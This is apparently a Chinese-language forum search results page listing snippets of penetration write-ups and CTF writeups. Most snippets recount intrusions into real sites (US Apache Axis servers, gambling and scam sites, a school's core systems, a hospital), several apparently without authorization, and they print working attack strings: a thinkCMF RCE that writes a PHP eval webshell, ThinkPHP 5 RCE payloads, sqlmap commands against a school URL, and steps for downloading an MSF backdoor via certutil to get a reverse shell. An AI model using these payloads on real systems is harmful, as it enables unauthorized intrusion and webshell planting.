搜尋結果

  1. T

    標題:繞過殺軟拿下目標站

    0x01 目标 country='US' app='APACHE-Axis'從老洞撿些漏網之魚,沒準還會有意外收穫 目標出現 還是熟悉的頁面,熟悉的端口 然後嘗試默認口令登錄,ok, 這下穩了 先蒐集一下信息 不要上來就部署包,先看一下現有的服務,像這種弱口令的基本上99.9999%都已經被人搞過了 再上傳包就多此一舉了,可以直接利用 找了一圈沒發現遺留的馬兒 找絕對路徑自己上傳 C:/elocker/webapps/admin/WEB-INF/classes 順手一測,竟然可以出網,也不需要傳shell了,直接掏出cs 執行命令 看結果失敗了 0x02...
  2. T

    標題:記一次繞過寶塔防火牆的BC站滲透

    0x00 信息收集 由於主站存在雲waf 一測就封且初步測試不存在能用得上的洞所以轉戰分站希望能通過分站獲得有價值的信息 這是一個查詢代理帳號的站url輸入admin 自動跳轉至後台 看這個參數猜測可能是thinkCMF 0x01 getshell thinkcmf正好有一個RCE 可以嘗試一下 ?a=fetchtemplateFile=public/indexprefix=''content=phpfile_put_contents('test1.php','?php @eval($_POST[zero])?')/php 白屏是個好兆頭應該是成功了 訪問一下...
  3. T

    標題:漏洞組合拿shell

    0x00 前言 在某次做滲透項目時,客戶只提供了一個IP。作為菜鳥的我開始遠航。 0x01 信息收集 Nmap掃描一下端口,注意掃描高位端口,往往有意外收穫。 弱口令嘗試登錄。 簡單匯總一下。 0x03 漏洞探测 登錄進後台測試發現兩個系統均存在sql注入。 還在8000端口上的crocus系統中找到一處任意文件下載漏洞。 原來是日誌下載。點擊發現頁面中存在絕對路徑。 OK!收集一下絕對路徑。 現在的思路是: 在有絕對路徑的前提下,配合sql注入,利用sqlmap的—sql-shell嘗試可以寫一句話木馬。 0x04 漏洞利用 仔細看這個絕對路徑。聽說仔細盯著它看會有奇效。...
  4. T

    標題:一次實戰中對tp5網站getshell方式的測試

    0x00 前言 之前接觸tp5的站比較少,只知道利用RCE漏洞getshell的方式。在最近對一個發卡平台滲透的過程中,由於php版本限制,無法直接使用RCE的payload拿shell,於是結合該網站盡可能多的測試一下tp5+php7.1環境下的getshell方法。 0x02 正文 拿到站點後,訪問首頁如下 測試中,發現是thinkphp的站,報錯如下 不過看不出來具體版本,不確定是否存在RCE,於是用exp打一下試試 _method=__constructmethod=getfilter=call_user_funcget[]=phpinfo...
  5. T

    標題:一次HW實戰

    0x00 信息收集 接到一個緊急測試任務,只有一個目標名稱(某某醫院)和一個ip。 首先,使用goby一把梭對拿到的ip來個全端口掃描: 服務包括Weblogic,jboss,springboot,Struts2,以及其他各式各樣的系統(簡直就是Nday練習靶場) 0x01 外网渗透 其中嘗試了利用jexboss打jboss反序列化,Weblogic的反序列化(10.3.6.0版本),Weblogic的其他CVE漏洞利用,springboot的未授權,Struts2的反序列化漏洞均失敗 但是在8282端口的臨床技能中心管理平台發現了弱口令 (admin/admin)可成功登陸到後台:...
  6. T

    標題:記一次不曲折的校內站點滲透

    0x01 前言 備考的時候偶然點了進了本校內網的某個站點, 停下了複習(直接拔劍) 0x02 渗透过程 測試到注入 http://url/newdetail.aspx?id=11999' or 1=1 -- 直接Sqlmap一把過, 連waf都沒得(狗頭) 隨便看看 python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch --dbs python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch -users DBMSsqlserver 2005...
  7. T

    標題:簡單的BC站點getshell

    0x01 确定目标 主站: 旁站: 0x02 漏洞利用 通過信息收集發現是個tp v5.0.9,此版本存在tp-rce漏洞。 直接通過payload進行測試, Post:_method=__constructfilter[]=assertmethod=getget[]=phpinfo() 查找payload,直接打: Post:_method=__constructfilter[]=assertmethod=getget[]=phpinfo() 發現是php 5.4.45版本的, 直接嘗試getshell: 發現system被禁用,嘗試其他系統命令的也一樣。...
  8. T

    標題:瘋狂暗示!一次對某色情app的滲透

    0x01 前言 找到某色情app的界面 看了看功能點,有一個註冊的地方,但是註冊的時候居然要邀請碼! 0x02 渗透过程 於是將app放到虛擬機,通過抓包拿到其真實域名 然後利用bp的爬蟲爬到一處api接口 提示參數缺失fuzz一波參數 http://www.
  9. T

    標題:逐個擊破!拿下學校核心系統

    0x01 前言 由於疫情問題,學校的易班APP新增了打卡系統,每天需要進行晨檢,午檢打卡,忘記的話就是上千字檢討 本人對於這種“形式主義”深感不滿,適逢最近成立了網絡安全戰隊,於是準備操作一番 0x02 踩点 基本的信息蒐集咱們就不多說了 因此不同系統使用了不同的多台服務器 看樣不能一勞永逸,需要各個系統、服務器奇妙的學校系統滲透之旅,拿下核心系統, 然後摸入核心系統中 首先打開“易班”系統的首頁是這個樣子 不難看出,開發者使用了TP框架,在簡單地測試了各種TP 注入, RCE的payload後均以失敗告終,看樣安全意識還不算太差...
  10. T

    標題:實戰滲透!我是如何一個破站日一天的

    0x00 使用关键词得到目标源码 某日上午接到臨時安排對某公司進行滲透測試,此次滲透給的是一個主域名,並且也沒有子域,打開了目標網站先對其進行一波信息收集 中間件: IIS 8.5 輸入admin發現自動添加了/ 說明其目錄存在,那麼盲猜一波文件,login.aspx default.aspx main.aspx 等等 最終在login.aspx下面發現後台登錄頁面。這不猜他一波弱口令? 一頓操作過後賬號被鎖 熟悉的開局,既然如此只能嘗試其他方法了。 在主頁的html代碼中發現了某處信息 設計製作?根據後面的域名訪問過去,是一個建站公司 那麼,入手點來了。...
  11. T

    標題:對非法網站的一次提權

    0x01 收集信息 因為主要想練習sql注入,所以信息收集做的比較簡單: 通過fofa找到相關cms,這裡發現棋牌後台登錄處存在SQL注入漏洞 0x02 漏洞利用 1.利用sqlmap一把梭,並獲取os-shell 2.利用python搭建一個簡單的http服務器,並掛載MSF生成的後門文件 python -m SimpleHTTPServer 3.os-shell下遠程下載後門執行程序 在os-shell下通過命令創建一個目錄 mkdir C:\test 在os-shell下通過certutil命令遠程下載後門文件到服務器上 4.執行msf反彈shell use...
  12. T

    標題:一兄弟被坑 我滲透進某BC的殺豬槃經歷

    一、事情的起因 這位兄弟找到我,告訴我被騙了很多錢,我們這些正義的白帽子當然能幫則幫啦.當然,畢竟是殺豬盤,即便是拿下也不能把錢追回 二、信息收集 拿到目標網站,可見是一個很常規的bc站,而且做的有點low逼。先進行簡單的信息收集通過Wappalyzer插件可見php版本與windows serve這兩個比較重要的信息 命令行nslookup+url查看ip,發現沒有CDN 再到站長工具上看看http://s.tool.chinaz.com/same 香港的,羊毛出在羊身上,中國人在騙中國人?知道ip地址後端口掃描一波(全端口掃描+服務探測。 這個過程比較漫長,可以先乾別的)...
  13. T

    標題:簡單繞過waf拿下賭博網站

    确定目标 收集信息 x.x.x.x首先常規測試方法一頓懟,目錄掃描,端口掃描,js文件,中間件,指紋識別,反正該上的都上。 隨手加個路徑,報錯了,當看到這個界面我瞬間就有思路了 為什麼這麼說呢,因為之前我就碰見過這樣的網站報錯, 這是一個php集成環境,叫upupw,跟phpstudy是一樣的 upupw -- pmd phpstudy -- phpmyadmin 突破点 這個集成環境包也有個phpinfo的頁面,跟數據庫管理界面 u.php 測試一下弱口令 root/root 連接成功後就可以看到phpinfo的頁面 好了現在問題變成phpmyadmin拿shell...
  14. T

    標題:某大學滲透實錄

    0x01 信息搜集 首先給定的目標為xxx 大學官網:www.xxx.edu.cn,但是不要真的就只是對主站進行測試了,一般像這種主站都是比較安全的,大概率採用一些站群系統,像學校很多使用博達的統一管理,自帶waf 1.子域名采集 可以通過subdomain3,fuzzdomain,subDomainsBrute,seay 子域名爆破 但是上述的我在此次滲透中並未使用,爆破時間太長了. 我用的fofa,shadon 這些個網絡空間搜索引擎 比如下圖: host='xxxx.edu.cn' 2.端口信息 通過上面fofa 的結果,得知ip 地址,使用端口掃描工具掃描。未發現可利用端口...
  15. T

    標題:深入詐騙團隊

    最近接到任務,調查一個詐騙團伙 上面有一個註冊接口,直接先註冊一個用戶看看他們怎麼詐騙的 好傢伙,用戶賺了8個億,充值過的用戶直呼內行。 這種站點一看就是那種詐騙團伙的殺豬盤,使用的那種tp5的框架一鍵搭建,方便又省事。後來根據報錯信息的確是tp5.0.10的框架還開了debug模式,老殺豬盤了。 直接先用tp5rce打出phpinfo看 s=captcha _method=__constructmethod=getfilter[]=call_user_funcget[]=phpinfo...
  16. T

    標題:2021第二屆“天翼杯”網絡安全攻防大賽writeup

    Web 1.esay_eval ?php class A{ public $code=''; function __call($method,$args){ eval($this-code); } function __wakeup(){ $this-code=''; } } class B{ function __destruct(){ echo $this-a-a(); } } if(isset($_REQUEST['poc'])){ preg_match_all('/'[BA]':(.*?):/s',$_REQUEST['poc'],$ret); if...
  17. T

    標題:第五屆強網杯全國網絡安全挑戰賽writeup

    Web 1.[强网先锋]寻宝 下發賽題,訪問鏈接如下: 該題需要你通過信息1 和信息2 分別獲取兩段Key 值,輸入Key1 和Key2 然後解密。 Key1之代碼審計 點擊“信息1”,發現是代碼審計: 完整源碼如下: ?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); function filter($string){...
  18. T

    標題:首屆'鶴城盃'CTF網絡安全挑戰賽- 初賽writeup

    WEB 1.middle_magic %0a繞過第一關最後加%23是# 數組繞過第二關 json 弱類型比較 http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1root_pwd[]=2level_3={'result':0}flag{f03d41bf6c8d55f12324fd57f7a00427} 2.easy_sql_2 登錄功能,post傳username和password。嘗試admin,admin弱口令登錄成功但是提示flag並不在這裡。...
  19. T

    標題:首屆北京大學信息安全綜合能力競賽writeup

    签到 題目內容是一個pdf 文件,用Adobe Acrobat 打開,看到其中包含一些特殊符號。 在編輯模式下,查看得到其字體為Wingdings,這是一個裝飾字體,文本內容其實是ASCII 碼。文本範圍是超出頁面的,resize 之後復制出其內容,給出了兩行文字: 這是柵欄密碼,得到flag 為flag{Have_A_Great_Time@GeekGame_v1!}。 fa{aeAGetTm@ekaev! lgHv__ra_ieGeGm_1} 小北问答 Remake 北京大學燕園校區有理科1 號樓到理科X 號樓,但沒有理科(X+1) 號及之後的樓。 X 是?在Google Earth...
  20. T

    標題:第七屆'湖湘杯'網絡安全大賽- 初賽writeup

    Web easywill 解題思路 變量覆蓋 http://eci-2zej1goyn9jh8hty6ton.cloudeci1.ichunqiu.com/?name=cfilevalue=/etc/passwd P神博客最近的文章利用pearcmd:https://tttang.com/archive/1312/ Pentest in Autumn 解題思路 http://eci-2ze40jm526y24nv2lkl3.cloudeci1.ichunqiu.com:8888/權限繞過/;/actuator/env /;/actuator/heapdump 解密腳本...
返回
上方